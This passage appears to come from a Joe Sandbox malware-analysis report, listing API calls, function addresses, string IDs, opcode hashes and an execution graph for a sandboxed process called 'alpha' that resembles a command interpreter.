                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706ECEE64
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ECEE78
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2759988882-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE11DC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE1277
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1135967885-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1a8a2c775685e02cf1b2bfab1f3375190b1ad7c956f01dc94337fd03ea84a7f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8471C775A0874286D760AF15AC606BBF6E4FFA9798FD04235C94D83B94DF3CA4918B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF000
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBEF40: wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF031
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBEF40: iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT ref: 00007FF706ECCCBC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECCCE0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3282654869-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75b1309d5c687d3f11c9717ebd62301fe66d33329ca8b2e84f456ad756eff731
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6561B361A0A74282FA14BB259C741BBE291BF54BE4FD45635CA1E0B7E1EF3CF4418320
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memmovewcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3879766669-2793719750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b3fb369deff4d4afefb78b93d750e48c4b9e67a4b4b225bf48054585d7624ef2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541F336F18B8A85EA65AF26EC102BBA294FF44B98F945131CE0E43784EF7CD4518390
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED97D0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED98D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDA0FC
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDA1FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /-Y
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886669725-4274875248
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 3$3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-2538865259
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 072efb953378862f576394cf8f245ad8125689c0a541a6717e5f20c107616034
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB414872A09B42C6EA18AB10EC6417BFBA0FF95B90FD88435CA5D03794DF3DA541C760

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.7%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:851
                                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:21
7ff706ec0a6c 273 API calls 18781->18789 18790 7ff706ebbe00 635 API calls 18781->18790 18791 7ff706ec3448 166 API calls 18781->18791 18792 7ff706ebcfab _wcsicmp 18781->18792 18793 7ff706ec0580 12 API calls 18781->18793 18797 7ff706ec1fac 238 API calls 18781->18797 18798 7ff706ebd044 ??_V@YAXPEAX 18781->18798 18834 7ff706ec0494 18781->18834 18847 7ff706ebdf60 18781->18847 18867 7ff706ed778c 18781->18867 18898 7ff706edc738 18781->18898 18782->18781 18783->18781 18784->18781 18785->18781 18787 7ff706ec855c ??_V@YAXPEAX 18786->18787 18787->18750 18789->18781 18790->18781 18791->18781 18792->18781 18794 7ff706ebd003 GetConsoleOutputCP GetCPInfo 18793->18794 18795 7ff706ec04f4 3 API calls 18794->18795 18795->18781 18797->18781 18798->18781 18800 7ff706ecb6e2 RevertToSelf CloseHandle 18799->18800 18801 7ff706eb96c8 18799->18801 18802 7ff706eb96ce 18801->18802 18803 7ff706eb6a48 184 API calls 18801->18803 18802->18704 18803->18801 18805 7ff706ec5a12 18804->18805 18806 7ff706ec596c 18804->18806 18805->18704 18806->18805 18807 7ff706ec598d VirtualQuery 18806->18807 18807->18805 18809 7ff706ec59ad 18807->18809 18808 7ff706ec59b7 VirtualQuery 18808->18805 18808->18809 18809->18805 18809->18808 18811 7ff706ede954 18810->18811 18812 7ff706ede990 18810->18812 18814 7ff706edee88 390 API calls 18811->18814 18813 7ff706ede9b4 197 API calls 18812->18813 18815 7ff706ede995 longjmp 18813->18815 18816 7ff706ede964 18814->18816 18816->18812 18817 7ff706eb96b4 186 API calls 18816->18817 18817->18816 18822 7ff706ed76a3 18818->18822 18819 7ff706ed76b7 18821 7ff706ede9b4 197 API calls 18819->18821 18820 7ff706eb96b4 186 API calls 18820->18822 18823 7ff706ed76bc longjmp 18821->18823 18822->18819 18822->18820 18825 7ff706ec2da3 18824->18825 18826 7ff706ec2d89 18824->18826 18825->18826 18828 7ff706ec2dbc GetProcessHeap RtlFreeHeap 18825->18828 18829 7ff706ec21af 18826->18829 18830 7ff706ec2e0c 18826->18830 18828->18825 18828->18826 18829->18736 18831 7ff706ec2e11 18830->18831 18832 7ff706ec2e32 
18830->18832 18831->18832 18833 7ff706ece494 VirtualFree 18831->18833 18832->18826 18835 7ff706ec04a4 18834->18835 18836 7ff706ec26e0 19 API calls 18835->18836 18837 7ff706ec04b9 _get_osfhandle SetFilePointer 18835->18837 18838 7ff706ecd845 18835->18838 18839 7ff706ecd839 18835->18839 18841 7ff706eb3278 166 API calls 18835->18841 18836->18835 18837->18781 18840 7ff706edf1d8 166 API calls 18838->18840 18842 7ff706eb3278 166 API calls 18839->18842 18843 7ff706ecd837 18840->18843 18844 7ff706ecd819 _getch 18841->18844 18842->18843 18844->18835 18845 7ff706ecd832 18844->18845 18917 7ff706edbde4 EnterCriticalSection LeaveCriticalSection 18845->18917 18848 7ff706ebdfe2 18847->18848 18849 7ff706ebdf93 18847->18849 18851 7ff706ebe100 VirtualFree 18848->18851 18852 7ff706ebe00b _setjmp 18848->18852 18849->18848 18850 7ff706ebdf9f GetProcessHeap RtlFreeHeap 18849->18850 18850->18848 18850->18849 18851->18848 18853 7ff706ebe04a 18852->18853 18861 7ff706ebe0c3 18852->18861 18918 7ff706ebe600 18853->18918 18855 7ff706ebe073 18856 7ff706ebe081 18855->18856 18857 7ff706ebe0e0 longjmp 18855->18857 18927 7ff706ebd250 18856->18927 18858 7ff706ebe0b0 18857->18858 18858->18861 18958 7ff706edd3fc 18858->18958 18861->18767 18864 7ff706ebe600 473 API calls 18865 7ff706ebe0a7 18864->18865 18865->18858 18866 7ff706edd610 167 API calls 18865->18866 18866->18858 18885 7ff706ed77bc 18867->18885 18868 7ff706ed7aca 18871 7ff706ec34a0 166 API calls 18868->18871 18869 7ff706ed79c0 18875 7ff706ec34a0 166 API calls 18869->18875 18873 7ff706ed7adb 18871->18873 18872 7ff706ed7ab5 18876 7ff706ec3448 166 API calls 18872->18876 18878 7ff706ed7af0 18873->18878 18882 7ff706ec3448 166 API calls 18873->18882 18874 7ff706ed7984 18874->18869 18879 7ff706ed7989 18874->18879 18881 7ff706ed79d6 18875->18881 18891 7ff706ed79ef 18876->18891 18877 7ff706ed7a00 18883 7ff706ed7a0b 18877->18883 18877->18891 18897 7ff706ed7a33 18877->18897 18880 7ff706ed778c 166 API calls 18878->18880 18879->18891 19054 7ff706ed76e0 
18879->19054 18884 7ff706ed7afb 18880->18884 18886 7ff706ec3448 166 API calls 18881->18886 18896 7ff706ed79e7 18881->18896 18882->18878 18888 7ff706ec34a0 166 API calls 18883->18888 18883->18891 18884->18879 18889 7ff706ec3448 166 API calls 18884->18889 18885->18868 18885->18869 18885->18872 18885->18874 18885->18877 18885->18879 18885->18891 18892 7ff706ec3448 166 API calls 18885->18892 18894 7ff706ed778c 166 API calls 18885->18894 18886->18896 18893 7ff706ed7a23 18888->18893 18889->18879 18890 7ff706ec3448 166 API calls 18890->18891 18891->18781 18892->18885 18895 7ff706ed778c 166 API calls 18893->18895 18894->18885 18895->18896 19050 7ff706ed7730 18896->19050 18897->18890 18899 7ff706edc775 18898->18899 18905 7ff706edc7ab 18898->18905 18900 7ff706ebcd90 166 API calls 18899->18900 18901 7ff706edc781 18900->18901 18902 7ff706edc8d4 18901->18902 18903 7ff706ebb0d8 194 API calls 18901->18903 18902->18781 18903->18902 18904 7ff706ebb6b0 170 API calls 18904->18905 18905->18901 18905->18902 18905->18904 18906 7ff706ebb038 _dup2 18905->18906 18907 7ff706ebd208 _close 18905->18907 18906->18905 18907->18905 18909 7ff706edd635 18908->18909 18910 7ff706edd63d 18908->18910 18913 7ff706edd672 longjmp 18909->18913 18914 7ff706ecc9da 18909->18914 18911 7ff706edd658 18910->18911 18912 7ff706edd64a 18910->18912 18911->18909 18916 7ff706eb3278 166 API calls 18911->18916 18915 7ff706eb3278 166 API calls 18912->18915 18913->18914 18914->18774 18914->18776 18915->18909 18916->18909 18919 7ff706ebe60f 18918->18919 18920 7ff706ecccca longjmp 18919->18920 18976 7ff706ebef40 18919->18976 18924 7ff706ebe637 18920->18924 18922 7ff706ebe626 18922->18920 18922->18924 18923 7ff706ec3448 166 API calls 18925 7ff706ecccfe 18923->18925 18924->18923 18926 7ff706ebe65f 18924->18926 18925->18855 18926->18855 18928 7ff706ebd267 18927->18928 18933 7ff706ebd2d3 18927->18933 18929 7ff706ebd284 _wcsicmp 18928->18929 18935 7ff706ebd2a6 18928->18935 18931 7ff706ebd32b 18929->18931 18929->18935 18930 
7ff706ebe600 473 API calls 18930->18933 18934 7ff706ebe600 473 API calls 18931->18934 18931->18935 18932 7ff706ebd316 18932->18858 18932->18864 18933->18928 18933->18930 18936 7ff706ebd305 18933->18936 18934->18931 18935->18932 18937 7ff706ebef40 472 API calls 18935->18937 18936->18932 18938 7ff706ebe600 473 API calls 18936->18938 18943 7ff706ebedf8 18937->18943 18938->18928 18939 7ff706ecd0a2 longjmp 18940 7ff706ecd0c5 18939->18940 18941 7ff706ec3448 166 API calls 18940->18941 18942 7ff706ecd0d4 18941->18942 18943->18939 18943->18940 18944 7ff706ebee68 18943->18944 18945 7ff706ebeeb1 18943->18945 18947 7ff706ebef40 472 API calls 18944->18947 18948 7ff706ebe600 473 API calls 18945->18948 18953 7ff706ebeec2 18945->18953 18957 7ff706ebeece 18945->18957 18946 7ff706ebcd90 166 API calls 18949 7ff706ebeee7 18946->18949 18947->18932 18948->18945 18950 7ff706ebef31 18949->18950 18951 7ff706ebeeef 18949->18951 18952 7ff706ede91c 198 API calls 18950->18952 18954 7ff706ebe600 473 API calls 18951->18954 18955 7ff706ebef36 18952->18955 18956 7ff706ebef40 472 API calls 18953->18956 18954->18932 18955->18939 18956->18957 18957->18932 18957->18946 18973 7ff706edd419 18958->18973 18959 7ff706eccadf 18960 7ff706edd576 18961 7ff706edd592 18960->18961 18971 7ff706edd555 18960->18971 18962 7ff706ec3448 166 API calls 18961->18962 18965 7ff706edd5a5 18962->18965 18963 7ff706edd5c4 18967 7ff706ec3448 166 API calls 18963->18967 18968 7ff706edd5ba 18965->18968 18970 7ff706ec3448 166 API calls 18965->18970 18966 7ff706edd541 18966->18961 18969 7ff706edd546 18966->18969 18967->18959 19020 7ff706edd36c 18968->19020 18969->18963 18969->18971 18970->18968 19027 7ff706edd31c 18971->19027 18973->18959 18973->18960 18973->18961 18973->18963 18973->18966 18973->18971 18974 7ff706edd3fc 166 API calls 18973->18974 18975 7ff706ec3448 166 API calls 18973->18975 18974->18973 18975->18973 18977 7ff706ebef71 18976->18977 18978 7ff706ecd1f3 18977->18978 18979 7ff706ebf130 18977->18979 18985 7ff706ebef87 
